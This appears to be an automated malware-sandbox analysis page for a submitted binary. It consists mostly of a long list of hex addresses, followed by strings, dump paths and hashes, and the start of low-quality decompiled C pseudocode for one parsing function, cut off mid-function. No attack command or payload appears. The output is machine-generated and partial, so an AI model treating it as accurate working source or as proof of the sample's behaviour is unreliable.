0x00b8d99a
0x00b8ec3a
0x00000000
0x00b8d9a0
0x00b8d9a0
0x00b8d9a0
0x00b8d9a3
0x00b8ec33
0x00000000
0x00b8d9a9
0x00b8d9a9
0x00b8d9ac
0x00b8ec2c
0x00000000
0x00b8d9b2
0x00b8d9bb
0x00b8d9c3
0x00b8d9c6
0x00b8d9c9
0x00b8d9cc
0x00b8d9d2
0x00b8d9da
0x00b8d9e0
0x00b8d9ea
0x00b8d9ea
0x00b8d9ed
0x00b8d9f5
0x00b8d9fc
0x00b8d9fc
0x00b8d9ef
0x00b8d9ef
0x00b8d9f1
0x00b8da04
0x00b8da0a
0x00b8da0c
0x00b8da10
0x00b8da15
0x00b8da22
0x00b8da24
0x00b8da2a
0x00b8da2f
0x00b8da31
0x00b8da34
0x00b8da3a
0x00b8da3b
0x00b8da40
0x00b8da46
0x00b8da4b
0x00b8da54
0x00b8da54
0x00b8da56
0x00b8da4d
0x00b8da4d
0x00b8da52
0x00000000
0x00000000
0x00b8da52
0x00b8da5c
0x00b8da64
0x00b8da66
0x00b8da6f
0x00b8da70
0x00b8da76
0x00b8da78
0x00b8de6b
0x00b8de71
0x00b8df90
0x00b8df90
0x00b8df97
0x00b8df97
0x00b8df97
0x00b8df9e
0x00b8dfa1
0x00b8dfa8
0x00b8dfa8
0x00b8dfa3
0x00b8dfa3
0x00b8dfa3
0x00b8dfac
0x00b8dfad
0x00b8dfaf
0x00b8dfb2
0x00b8dfb5
0x00b8dfb8
0x00b8dfbe
0x00b8dfc1
0x00b8dfc4
0x00b8dfce
0x00b8dfce
0x00b8dfce
0x00b8dfc6
0x00b8dfc6
0x00b8dfc8
0x00000000
0x00b8dfca
0x00b8dfca
0x00b8dfca
0x00b8dfc8
0x00b8dfd0
0x00b8dfd2
0x00b8e073
0x00b8e073
0x00b8e080
0x00b8e080
0x00b8e080
0x00b8e096
0x00b8e09b
0x00b8dfd8
0x00b8dfd8
0x00b8dfda
0x00000000
0x00b8dfe0
0x00b8dfe2
0x00b8dfe3
0x00b8dfe5
0x00b8dfe7
0x00b8dfe7
0x00b8dfe9
0x00b8dfec
0x00b8dff4
0x00b8dff6
0x00b8dff9
0x00b8dfff
0x00b8dfff
0x00b8e001
0x00b8e00d
0x00b8e00d
0x00b8e00d
0x00b8e003
0x00b8e005
0x00b8e005
0x00b8e014
0x00b8e017
0x00b8e019
0x00b8e020
0x00b8e020
0x00b8e01b
0x00b8e01b
0x00b8e01b
0x00b8e028
0x00b8e032
0x00b8e038
0x00b8e039
0x00b8e03e
0x00b8e044
0x00b8e047
0x00000000
0x00000000
0x00b8e049
0x00b8e049
0x00b8e051
0x00b8e051
0x00b8e057
0x00b8e05e
0x00b8e06b
0x00b8e060
0x00b8e060
0x00b8e063
0x00b8e063
0x00b8e05e
0x00b8dfda
0x00b8e0a7
0x00b8e0b7
0x00b8e0c4
0x00b8e0c6
0x00b8e0cd
0x00b8de77
0x00b8de77
0x00b8de80
0x00b8de81
0x00b8de8b
0x00b8de91
0x00b8de93
0x00b8de99
0x00b8de99
0x00b8de9b
0x00b8de9b
0x00b8dea2
0x00b8dea9
0x00000000
0x00000000
0x00b8deaf
0x00b8deb2
0x00b8deb5
0x00000000
0x00b8deb7
0x00b8deb7
0x00b8deb7
0x00b8deb7
0x00b8debe
0x00b8dec1
0x00b8dec8
0x00b8dec8
0x00b8dec3
0x00b8dec3
0x00b8dec3
0x00b8decc
0x00b8decf
0x00b8ded1
0x00b8ded3
0x00b8ded9
0x00b8dedf
0x00b8dee1
0x00b8dee1
0x00b8dee1
0x00b8dee8
0x00b8dee8
0x00b8deea
0x00b8def6
0x00b8def6
0x00b8def6
0x00b8deec
0x00b8deee
0x00b8deee
0x00b8defd
0x00b8df00
0x00b8df02
0x00b8df09
0x00b8df09
0x00b8df04
0x00b8df04
0x00b8df04
0x00b8df11
0x00b8df1c
0x00b8df22
0x00b8df23
0x00b8df28
0x00b8df2e
0x00b8df31
0x00000000
0x00000000
0x00b8df33
0x00b8df33
0x00b8df3d
0x00b8df48
0x00b8df50
0x00b8df56
0x00b8df61
0x00b8df67
0x00b8df6e
0x00b8df81
0x00b8df88
0x00b8df88
0x00000000
0x00b8deb5
0x00b8de9b
0x00000000
0x00b8de93
0x00b8e0d0
0x00b8e0d0
0x00b8e0d6
0x00b8e0db
0x00b8e0e1
0x00b8e0f4
0x00b8e0f9
0x00b8da7e
0x00b8da7e
0x00b8da87
0x00b8da88
0x00b8da92
0x00b8da98
0x00b8da9a
0x00b8dca0
0x00b8dca8
0x00b8dcab
0x00b8dcb0
0x00b8dcb3
0x00b8dcbb
0x00b8dcbf
0x00b8dcc5
0x00b8dccb
0x00b8dcd0
0x00b8dcd7
0x00b8dcd8
0x00b8dcd8
0x00b8dcd8
0x00b8dcdf
0x00b8dce2
0x00b8dcea
0x00b8dcf0
0x00b8dcf5
0x00b8dcf5
0x00b8dcf2
0x00b8dcf2
0x00b8dcf2
0x00b8dcf9
0x00b8dcfa
0x00b8dcfc
0x00b8dcff
0x00b8dd05
0x00b8dd0b
0x00b8dd0e
0x00b8dd11
0x00b8dd17
0x00b8dd1a
0x00b8dd1d
0x00b8dd27
0x00b8dd27
0x00b8dd27
0x00b8dd1f
0x00b8dd1f
0x00b8dd21
0x00000000
0x00b8dd23
0x00b8dd23
0x00b8dd23
0x00b8dd21
0x00b8dd29
0x00b8dd2b
0x00b8de1d
0x00b8de1d
0x00b8de1f
0x00b8de25
0x00b8de2b
0x00b8de40
0x00b8de45
0x00b8dd31
0x00b8dd31
0x00b8dd33
0x00000000
0x00b8dd39
0x00b8dd3b
0x00b8dd3c
0x00b8dd3e
0x00b8dd40
0x00b8dd42
0x00b8dd42
0x00b8dd48
0x00b8dd4a
0x00b8dd50
0x00b8dd53
0x00b8dd61
0x00b8dd67
0x00b8dd67
0x00b8dd69
0x00b8dd6c
0x00b8dd72
0x00b8dd72
0x00b8dd74
0x00000000
0x00000000
0x00b8dd76
0x00b8dd78
0x00b8dd7e
0x00b8dd7e
0x00b8dd7a
0x00b8dd7a
0x00b8dd7a
0x00b8dd83
0x00b8dd85
0x00b8dd8c
0x00b8dd8c
0x00b8dd87
0x00b8dd87
0x00b8dd87
0x00b8ddb2
0x00b8ddb8
0x00b8ddbb
0x00b8ddc1
0x00b8ddc8
0x00b8ddc9
0x00b8ddca
0x00b8ddd0
0x00b8ddd3
0x00b8ddd5
0x00000000
0x00b8ddd5
0x00000000
0x00b8ddd3
0x00b8dddd
0x00b8dde3
0x00b8ddeb
0x00b8ddeb
0x00b8ddec
0x00b8ddee
0x00b8ddf2
0x00b8ddfa
0x00b8ddfa
0x00b8ddfa
0x00b8ddfc
0x00b8de03
0x00b8de08
0x00b8de15
0x00b8de0a
0x00b8de0d
0x00b8de0d
0x00b8de08
0x00b8dd33
0x00b8de48
0x00b8de52
0x00b8de58
0x00b8de5e
0x00b8de64
0x00b8daa0
0x00b8daa0
0x00b8daa0
0x00b8daa2
0x00b8daa9
0x00b8dab0
0x00000000
0x00000000
0x00b8dab6
0x00b8dab9
0x00b8dabc
0x00000000
0x00b8dabe
0x00b8dac6
0x00b8dacb
0x00b8dad0
0x00b8dad1
0x00b8dad3
0x00b8dadb
0x00b8dadf
0x00b8dae5
0x00b8daeb
0x00b8daf0
0x00b8daf7
0x00b8daf7
0x00b8daf8
0x00b8dafb
0x00b8db03
0x00b8db09
0x00b8db0e
0x00b8db0e
0x00b8db0b
0x00b8db0b
0x00b8db0b
0x00b8db12
0x00b8db13
0x00b8db15
0x00b8db18
0x00b8db1e
0x00b8db24
0x00b8db27
0x00b8db2a
0x00b8db30
0x00b8db33
0x00b8db36
0x00b8db40
0x00b8db40
0x00b8db40
0x00b8db38
0x00b8db38
0x00b8db3a
0x00000000
0x00b8db3c
0x00b8db3c
0x00b8db3c
0x00b8db3a
0x00b8db42
0x00b8db44
0x00b8dc39
0x00b8dc39
0x00b8dc3b
0x00b8dc41
0x00b8dc47
0x00b8dc5c
0x00b8dc61
0x00b8db4a
0x00b8db4a
0x00b8db4c
0x00000000
0x00b8db52
0x00b8db54
0x00b8db55
0x00b8db57
0x00b8db59
0x00b8db5b
0x00b8db5b
0x00b8db61
0x00b8db63
0x00b8db69
0x00b8db6c
0x00b8db7a
0x00b8db80
0x00b8db80
0x00b8db82
0x00b8db85
0x00b8db8b
0x00b8db8b
0x00b8db8d
0x00000000
0x00000000
0x00b8db8f
0x00b8db91
0x00b8db97
0x00b8db97
0x00b8db93
0x00b8db93
0x00b8db93
0x00b8db9c
0x00b8db9e
0x00b8dbab
0x00b8dbab
0x00b8dba0
0x00b8dba6
0x00b8dba6
0x00b8dbc9
0x00b8dbd1
0x00b8dbd8
0x00b8dbdf
0x00b8dbe0
0x00b8dbe3
0x00b8dbe9
0x00b8dbef
0x00b8dbf2
0x00b8dbf4
0x00000000
0x00b8dbf4
0x00000000
0x00b8dbf2
0x00b8dbfc
0x00b8dc02
0x00b8dc02
0x00b8dc08
0x00b8dc0a
0x00b8dc14
0x00b8dc16
0x00b8dc16
0x00b8dc16
0x00b8dc18
0x00b8dc1f
0x00b8dc24
0x00b8dc31
0x00b8dc26
0x00b8dc29
0x00b8dc29
0x00b8dc24
0x00b8db4c
0x00b8dc64
0x00b8dc6f
0x00b8dc70
0x00b8dc71
0x00b8dc77
0x00b8dc7d
0x00b8dc83
0x00b8dc83
0x00000000
0x00b8dabc
0x00000000
0x00b8daa2
0x00b8dc84
0x00b8dc8a
0x00b8dc91
0x00b8dc92
0x00b8dc93
0x00b8dc98
0x00b8dc98
0x00b8e0fc
0x00b8e106
0x00b8e107
0x00b8e10d
0x00b8e10f
0x00b8e578
0x00b8e57a
0x00b8e57c
0x00b8e582
0x00b8e584
0x00b8e58a
0x00b8e58c
0x00b8e8de
0x00b8e8de
0x00b8e8e0
0x00b8e8e6
0x00b8e8ed
0x00b8e8f3
0x00b8e8f5
0x00b8e993
0x00b8e993
0x00b8e995
0x00b8e996
0x00b8e99c
0x00000000
0x00b8e8fb
0x00b8e8fb
0x00b8e8fe
0x00b8e904
0x00b8e90a
0x00b8e90c
0x00b8e912
0x00b8e914
0x00b8e914
0x00b8e916
0x00b8e916
0x00b8e91f
0x00b8e926
0x00b8e92c
0x00b8e92f
0x00b8e930
0x00b8e932
0x00b8e932
0x00b8e936
0x00b8e938
0x00b8e93a
0x00b8e940
0x00b8e943
0x00000000
0x00b8e945
0x00b8e945
0x00b8e94c
0x00b8e94c
0x00b8e943
0x00b8e938
0x00b8e90c
0x00b8e8fe
0x00b8e8f5
0x00b8e592
0x00b8e592
0x00b8e592
0x00b8e595
0x00b8e599
0x00b8e599
0x00b8e59a
0x00b8e5ac
0x00b8e5b9
0x00b8e5c8
0x00b8e5f2
0x00b8e5f7
0x00b8e5fd
0x00b8e600
0x00b8e606
0x00b8e609
0x00b8e6a2
0x00b8e6a9
0x00b8e727
0x00b8e72d
0x00b8e733
0x00b8e736
0x00b8e738
0x00b8e7c1
0x00b8e73e
0x00b8e73e
0x00b8e744
0x00b8e744
0x00b8e74a
0x00b8e750
0x00b8e752
0x00b8e754
0x00b8e754
0x00b8e75a
0x00b8e760
0x00b8e762
0x00b8e76a
0x00b8e76a
0x00b8e770
0x00b8e772
0x00b8e774
0x00b8e77a
0x00b8e77c
0x00b8e893
0x00b8e895
0x00b8e89b
0x00b8e89b
0x00b8e89e
0x00b8e89f
0x00000000
0x00b8e782
0x00b8e788
0x00b8e788
0x00b8e78a
0x00b8e790
0x00b8e793
0x00b8e79a
0x00b8e7a0
0x00b8e7a2
0x00b8e7c9
0x00b8e7cb
0x00b8e7cd
0x00b8e7cf
0x00b8e7d5
0x00b8e7db
0x00b8e875
0x00b8e875
0x00b8e878
0x00000000
0x00b8e87e
0x00b8e87e
0x00b8e884
0x00000000
0x00b8e884
0x00b8e7e1
0x00b8e7e1
0x00b8e7e1
0x00b8e7e4
0x00000000
0x00000000
0x00b8e7e6
0x00b8e7e8
0x00b8e7ea
0x00b8e7f3
0x00b8e7f3
0x00b8e7f5
0x00b8e7fb
0x00b8e7fb
0x00b8e807
0x00b8e812
0x00b8e815
0x00b8e822
0x00b8e825
0x00b8e826
0x00b8e827
0x00b8e82d
0x00b8e82f
0x00b8e835
0x00b8e83b
0x00000000
0x00000000
0x00000000
0x00000000
0x00b8e83d
0x00b8e83d
0x00b8e83d
0x00b8e83f
0x00000000
0x00000000
0x00b8e841
0x00b8e844
0x00000000
0x00b8e84a
0x00b8e84a
0x00b8e84c
0x00b8e84e
0x00b8e84e
0x00b8e84e
0x00b8e856
0x00b8e859
0x00b8e859
0x00b8e85f
0x00b8e861
0x00b8e863
0x00b8e86a
0x00b8e870
0x00b8e872
0x00000000
0x00b8e872
0x00000000
0x00b8e844
0x00000000
0x00b8e83d
0x00000000
0x00b8e7e1
0x00b8e7a4
0x00b8e7a4
0x00b8e7a6
0x00b8e7ac
0x00b8e7b3
0x00b8e7b3
0x00b8e7b6
0x00b8e7b6
0x00000000
0x00b8e7a6
0x00000000
0x00b8e88a
0x00b8e88a
0x00b8e88b
0x00b8e88b
0x00000000
0x00b8e790
0x00b8e6ab
0x00b8e6ab
0x00b8e6bd
0x00b8e6cc
0x00b8e6d1
0x00b8e6d4
0x00b8e6d6
0x00000000
0x00b8e6dc
0x00b8e6dc
0x00b8e6df
0x00000000
0x00b8e6e5
0x00b8e6e5
0x00b8e6ec
0x00000000
0x00b8e6f2
0x00b8e6f8
0x00b8e6fa
0x00b8e700
0x00b8e700
0x00b8e702
0x00b8e702
0x00b8e704
0x00b8e70d
0x00b8e714
0x00b8e717
0x00b8e718
0x00b8e71a
0x00b8e71a
0x00000000
0x00b8e722
0x00b8e6ec
0x00b8e6df
0x00b8e6d6
0x00b8e60f
0x00b8e60f
0x00b8e615
0x00b8e617
0x00b8e633
0x00b8e636
0x00000000
0x00b8e63c
0x00b8e63c
0x00b8e643
0x00000000
0x00b8e649
0x00b8e64f
0x00b8e651
0x00b8e657
0x00b8e657
0x00b8e659
0x00b8e659
0x00b8e65b
0x00b8e664
0x00b8e66b
0x00b8e66e
0x00b8e66f
0x00b8e671
0x00b8e671
0x00b8e679
0x00b8e679
0x00b8e67b
0x00000000
0x00b8e681
0x00b8e681
0x00b8e687
0x00b8e68a
0x00b8e954
0x00b8e957
0x00b8e95d
0x00b8e972
0x00b8e977
0x00b8e97a
0x00b8e690
0x00b8e690
0x00b8e697
0x00000000
0x00b8e697
0x00b8e68a
0x00b8e67b
0x00b8e643
0x00b8e619
0x00b8e619
0x00b8e61b
0x00b8e621
0x00b8e627
0x00b8e628
0x00b8e8a5
0x00b8e8a5
0x00b8e8ac
0x00b8e8ad
0x00b8e8ae
0x00b8e8b3
0x00b8e8b6
0x00b8e8b6
0x00b8e8b6
0x00b8e617
0x00b8e8b8
0x00b8e8b8
0x00b8e8ba
0x00b8e981
0x00b8e988
0x00b8e98f
0x00b8e9a2
0x00b8e9a8
0x00b8e9a9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00b8e8c0
0x00b8e8c6
0x00b8e8c6
0x00b8e8cc
0x00b8e8cc
0x00b8e8d8
0x00000000
0x00b8e8d8
0x00b8e115
0x00b8e115
0x00b8e117
0x00b8e11d
0x00b8e11f
0x00b8e125
0x00b8e127
0x00b8e49e
0x00b8e49e
0x00b8e4a0
0x00b8e4a6
0x00b8e4ad
0x00b8e4af
0x00b8e50e
0x00b8e511
0x00b8e517
0x00b8e51d
0x00b8e523
0x00b8e525
0x00b8e52b
0x00b8e52d
0x00b8e52d
0x00b8e52f
0x00b8e52f
0x00b8e531
0x00b8e53a
0x00b8e541
0x00b8e544
0x00b8e545
0x00b8e547
0x00b8e547
0x00b8e54f
0x00b8e551
0x00b8e557
0x00b8e55d
0x00b8e560
0x00000000
0x00b8e566
0x00b8e566
0x00b8e56d
0x00b8e56d
0x00b8e560
0x00b8e551
0x00b8e525
0x00b8e4b1
0x00b8e4b1
0x00b8e4b3
0x00b8e4b9
0x00b8e4bf
0x00000000
0x00b8e4bf
0x00b8e4af
0x00b8e12d
0x00b8e12d
0x00b8e12d
0x00b8e130
0x00b8e134
0x00b8e134
0x00b8e135
0x00b8e147
0x00b8e154
0x00b8e163
0x00b8e18d
0x00b8e192
0x00b8e198
0x00b8e19b
0x00b8e1a1
0x00b8e1a4
0x00b8e220
0x00b8e227
0x00b8e2eb
0x00b8e2f1
0x00b8e2f7
0x00b8e2fa
0x00b8e2fc
0x00b8e385
0x00b8e302
0x00b8e302
0x00b8e308
0x00b8e308
0x00b8e30e
0x00b8e314
0x00b8e316
0x00b8e318
0x00b8e318
0x00b8e31e
0x00b8e324
0x00b8e326
0x00b8e32e
0x00b8e32e
0x00b8e334
0x00b8e336
0x00b8e338
0x00b8e33e
0x00b8e340
0x00b8e457
0x00b8e459
0x00b8e45f
0x00b8e45f
0x00000000
0x00b8e346
0x00b8e34c
0x00b8e34c
0x00b8e34e
0x00b8e354
0x00b8e357
0x00b8e35e
0x00b8e364
0x00b8e366
0x00b8e38d
0x00b8e38f
0x00b8e391
0x00b8e393
0x00b8e399
0x00b8e39f
0x00b8e439
0x00b8e439
0x00b8e43c
0x00000000
0x00b8e442
0x00b8e442
0x00b8e448
0x00000000
0x00b8e448
0x00b8e3a5
0x00b8e3a5
0x00b8e3a5
0x00b8e3a8
0x00000000
0x00000000
0x00b8e3aa
0x00b8e3ac
0x00b8e3ae
0x00b8e3b7
0x00b8e3b7
0x00b8e3b9
0x00b8e3bf
0x00b8e3bf
0x00b8e3cb
0x00b8e3d6
0x00b8e3d9
0x00b8e3e6
0x00b8e3e9
0x00b8e3ea
0x00b8e3eb
0x00b8e3f1
0x00b8e3f3
0x00b8e3f9
0x00b8e3ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00b8e401
0x00b8e401
0x00b8e401
0x00b8e403
0x00000000
0x00000000
0x00b8e405
0x00b8e408
0x00b8e4c2
0x00b8e4c2
0x00b8e4c4
0x00b8e4ca
0x00b8e4d0
0x00b8e4d1
0x00000000
0x00b8e40e
0x00b8e40e
0x00b8e410
0x00b8e412
0x00b8e412
0x00b8e412
0x00b8e41a
0x00b8e41d
0x00b8e41d
0x00b8e423
0x00b8e425
0x00b8e427
0x00b8e42e
0x00b8e434
0x00b8e436
0x00000000
0x00b8e436
0x00000000
0x00b8e408
0x00000000
0x00b8e401
0x00000000
0x00b8e3a5
0x00b8e368
0x00b8e368
0x00b8e36a
0x00b8e370
0x00b8e377
0x00b8e377
0x00b8e37a
0x00b8e37a
0x00000000
0x00b8e36a
0x00000000
0x00b8e44e
0x00b8e44e
0x00b8e44f
0x00b8e44f
0x00000000
0x00b8e354
0x00b8e22d
0x00b8e22d
0x00b8e23f
0x00b8e24e
0x00b8e253
0x00b8e256
0x00b8e258
0x00b8e274
0x00b8e277
0x00000000
0x00b8e27d
0x00b8e27d
0x00b8e284
0x00000000
0x00b8e28a
0x00b8e290
0x00b8e292
0x00b8e298
0x00b8e298
0x00b8e29a
0x00b8e29a
0x00b8e29c
0x00b8e2a5
0x00b8e2ac
0x00b8e2af
0x00b8e2b0
0x00b8e2b2
0x00b8e2b2
0x00000000
0x00b8e29a
0x00b8e284
0x00b8e25a
0x00b8e25c
0x00b8e262
0x00b8e268
0x00b8e269
0x00000000
0x00b8e269
0x00b8e258
0x00b8e1a6
0x00b8e1a6
0x00b8e1ac
0x00b8e1ae
0x00b8e1c3
0x00b8e1c6
0x00000000
0x00b8e1cc
0x00b8e1cc
0x00b8e1d3
0x00000000
0x00b8e1d9
0x00b8e1df
0x00b8e1e1
0x00b8e1e7
0x00b8e1e7
0x00b8e1e9
0x00b8e1e9
0x00b8e1eb
0x00b8e1f4
0x00b8e1fb
0x00b8e1fe
0x00b8e1ff
0x00b8e201
0x00b8e201
0x00b8e2ba
0x00b8e2ba
0x00b8e2bc
0x00000000
0x00b8e2c2
0x00b8e2c2
0x00b8e2c8
0x00b8e2cb
0x00b8e20e
0x00b8e215
0x00000000
0x00b8e2d1
0x00b8e2d3
0x00b8e2d9
0x00b8e2df
0x00b8e2e0
0x00b8e4d7
0x00b8e4d7
0x00b8e4de
0x00b8e4df
0x00b8e4e0
0x00b8e4e5
0x00b8e4e8
0x00b8e4e8
0x00b8e2cb
0x00b8e2bc
0x00b8e1d3
0x00b8e1b0
0x00b8e1b0
0x00b8e1b2
0x00b8e1b8
0x00b8e462
0x00b8e462
0x00b8e463
0x00b8e469
0x00b8e469
0x00b8e470
0x00b8e471
0x00b8e472
0x00b8e477
0x00b8e47a
0x00b8e47a
0x00b8e47a
0x00b8e1ae
0x00b8e47c
0x00b8e47c
0x00b8e47e
0x00b8e4ec
0x00b8e4f3
0x00b8e4f3
0x00b8e4f3
0x00b8e4fa
0x00b8e4fc
0x00b8e502
0x00b8e503
0x00b8e9af
0x00b8e9af
0x00b8e9b0
0x00b8e9b1
0x00b8e9b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00b8e480
0x00b8e486
0x00b8e486
0x00b8e48c
0x00b8e48c
0x00b8e498
0x00000000
0x00b8e498
0x00b8e127
0x00b8e9b9
0x00b8e9b9
0x00b8e9bf
0x00b8e9c1
0x00b8e9c7
0x00b8e9cd
0x00b8e9cf
0x00b8e9d1
0x00b8e9d3
0x00b8e9d3
0x00b8e9d5
0x00b8e9d5
0x00b8e9de
0x00b8e9df
0x00b8e9e3
0x00b8e9ea
0x00b8e9ed
0x00b8e9ee
0x00b8e9f0
0x00b8e9f0
0x00b8e9f4
0x00b8e9fa
0x00b8e9fc
0x00b8ea02
0x00b8ea04
0x00b8ea0a
0x00b8ea0d
0x00b8ea20
0x00b8ea23
0x00b8ea29
0x00b8ea3e
0x00b8ea43
0x00b8ea0f
0x00b8ea11
0x00b8ea18
0x00b8ea18
0x00b8ea0d
0x00b8ea46
0x00b8ea46
0x00b8ea56
0x00b8ea5f
0x00b8ea60
0x00b8ea62
0x00b8eaf9
0x00b8eafb
0x00b8eb06
0x00b8eb06
0x00b8eb08
0x00b8eb0b
0x00b8eb0d
0x00000000
0x00b8eafd
0x00b8eb03
0x00b8eb03
0x00b8ea68
0x00b8ea68
0x00b8ea6e
0x00b8ea71
0x00b8ea77
0x00b8ea7a
0x00b8ea80
0x00b8ea82
0x00b8ea88
0x00b8ea8a
0x00b8ea8c
0x00b8ea8c
0x00b8ea8e
0x00b8ea8e
0x00b8ea9b
0x00b8eaa2
0x00b8eaa5
0x00b8eaa6
0x00b8eaa8
0x00b8eaa9
0x00b8eaa9
0x00b8eaad
0x00b8eab3
0x00b8eab5
0x00b8eab7
0x00b8eabd
0x00b8eac0
0x00b8ead4
0x00b8eada
0x00b8eaef
0x00b8eaf4
0x00b8eac2
0x00b8eac2
0x00b8eac9
0x00b8eac9
0x00b8eac0
0x00b8eab5
0x00b8eb13
0x00b8eb13
0x00b8eb13
0x00b8eb1f
0x00b8eb22
0x00b8eb28
0x00b8eb2a
0x00b8eb2c
0x00b8eb32
0x00b8eb34
0x00b8eb34
0x00b8eb34
0x00b8eb32
0x00b8eb39
0x00b8eb3a
0x00b8eb3c
0x00b8eb3e
0x00b8eb3e
0x00b8eb40
0x00b8eb46
0x00b8eb4c
0x00b8eb4e
0x00b8eb54
0x00b8eb54
0x00b8eb5a
0x00b8eb5c
0x00000000
0x00000000
0x00b8eb62
0x00b8eb64
0x00b8eb66
0x00b8eb66
0x00b8eb68
0x00b8eb68
0x00b8eb78
0x00b8eb7f
0x00b8eb82
0x00b8eb83
0x00b8eb85
0x00b8eb85
0x00b8eb89
0x00b8eb8f
0x00b8eb91
0x00b8eb93
0x00b8eb99
0x00b8eb9c
0x00b8ebad
0x00b8ebb0
0x00b8ebb6
0x00b8ebcb
0x00b8ebd0
0x00b8eb9e
0x00b8eb9e
0x00b8eba5
0x00b8eba5
0x00b8eb9c
0x00b8ebe1
0x00b8ebf0
0x00b8ebf1
0x00b8ebf1
0x00b8ebf3
0x00b8ebf5
0x00b8ebf5
0x00b8ebfb
0x00b8ebfe
0x00b8ec00
0x00b8ec02
0x00b8ec02
0x00b8ec05
0x00b8ec06
0x00b8ec06
0x00b8ec0b
0x00b8ec0e
0x00b8ec12
0x00b8ec12
0x00b8ec13
0x00b8ec15
0x00b8ec1b
0x00b8ec21
0x00000000
0x00000000
0x00000000
0x00b8ec21
0x00b8eb54
0x00b8ec27
0x00b8ec27
0x00000000
0x00b8ec27
0x00b8d9ac
0x00b8d9a3
0x00b8d99a
0x00b8d951
0x00b8d955
0x00b8d95d
0x00000000
0x00b8d95f
0x00b8d965
0x00b8d96a
0x00b8ec46
0x00b8ec46
0x00b8ec49
0x00b8ec54
0x00b8ec7f
0x00b8ec80
0x00b8ec81
0x00b8ec82
0x00b8ec83
0x00b8ec84
0x00b8ec89
0x00b8ec8a
0x00b8ec91
0x00b8ec96
0x00b8ec9c
0x00b8eca1
0x00b8eca2
0x00b8eca2
0x00b8eca2
0x00b8eca8
0x00b8eca9
0x00b8eca9
0x00b8ecac
0x00b8ecb2
0x00000000
0x00000000
0x00b8ecb4
0x00b8ecb9
0x00b8ecbc
0x00b8ecbe
0x00b8ecc6
0x00b8ecc8
0x00b8ecca
0x00b8eccf
0x00b8ecd2
0x00b8ecd8
0x00b8ecdb
0x00b8ecdd
0x00b8ecdd
0x00b8ecdd
0x00b8ecdd
0x00b8ecdb
0x00b8ece0
0x00b8ecec
0x00b8ecf2
0x00b8ecfa
0x00b8ecff
0x00b8ed00
0x00b8ed05
0x00b8ed05
0x00b8ed05
0x00b8ed05
0x00b8ed09
0x00b8ed09
0x00b8ed0c
0x00b8ed13
0x00b8ed20
0x00b8ec56
0x00b8ec56
0x00b8ec56
0x00b8ec5d
0x00b8ec5e
0x00b8ec5f
0x00b8ec60
0x00b8ec69
0x00b8ec6e
0x00b8ec7c
0x00b8ec7c
0x00b8ec54
0x00b8d95d

APIs

__floor_pentium4.LIBCMT ref: 00B8DA34

Strings

1#QNAN, xrefs: 00B8EC3A
1#SNAN, xrefs: 00B8EC33
1#INF, xrefs: 00B8EC41
1#IND, xrefs: 00B8EC2C

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 2d5eb0abe7438f93ce182089262007a478a135bd4d2ae4af0ce28e33762cfdee
Instruction ID: cd31788a5105e7b84c4e0d5883f191a752d4a59d5447ab4862b7c7b00c4c70f4
Opcode Fuzzy Hash: 2d5eb0abe7438f93ce182089262007a478a135bd4d2ae4af0ce28e33762cfdee
Instruction Fuzzy Hash: 4CC23871E086298FDB25EE289D807EAB7F5EB44305F1441EAD85DE7290E774AE81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00B632F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E00B632F7(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				void* _t237;
				signed int _t240;
				void* _t246;
				unsigned int _t248;
				unsigned int _t252;
				void* _t253;
				signed int _t257;
				char _t269;
				signed int _t277;
				signed int _t289;
				unsigned int _t290;
				intOrPtr _t291;
				signed int _t292;
				signed int _t295;
				char _t302;
				signed char _t304;
				signed int _t319;
				signed int _t328;
				signed int _t329;
				signed int _t331;
				signed int _t335;
				signed int _t350;
				signed char _t352;
				unsigned int _t363;
				intOrPtr _t370;
				void* _t373;
				intOrPtr _t374;
				void* _t381;
				signed int _t383;
				void* _t384;
				signed int _t395;
				intOrPtr* _t399;
				signed int _t414;
				signed int _t423;
				char _t432;
				signed int _t433;
				signed int _t438;
				signed int _t442;
				intOrPtr _t450;
				unsigned int _t456;
				unsigned int _t459;
				signed int _t463;
				signed int _t471;
				signed int _t480;
				signed int _t485;
				signed int _t500;
				signed int _t502;
				signed char _t503;
				signed int _t504;
				unsigned int _t505;
				intOrPtr _t514;
				void* _t515;
				void* _t522;
				signed int _t525;
				void* _t526;
				signed int _t536;
				void* _t542;
				void* _t544;
				intOrPtr _t547;
				void* _t548;
				void* _t550;
				void* _t551;
				intOrPtr _t561;

				_t551 = _t550 - 0x68;
				E00B7EB78(0xb926be, _t548);
				E00B7EC50(0x2068);
				_t399 = __ecx;
				E00B6CB83(_t548 + 0x30, __ecx);
				 *(_t548 + 0x64) = 0;
				 *((intOrPtr*)(_t548 - 4)) = 0;
				if( *((intOrPtr*)(__ecx + 0x6cd4)) == 0) {
					L18:
					 *((char*)(_t548 + 0x6a)) = 0;
					L19:
					_push(7);
					_t237 = E00B6CD8A();
					__eflags = _t237 - 7;
					if(_t237 >= 7) {
						 *(_t399 + 0x220c) = 0;
						 *(_t399 + 0x21fc) = E00B6CBFB(_t548 + 0x30);
						_t536 = E00B6CD66(_t548 + 0x30, 4);
						_t240 = E00B6CCFB();
						__eflags = _t240 | _t500;
						if((_t240 | _t500) == 0) {
							L88:
							E00B620D7(_t399);
							L89:
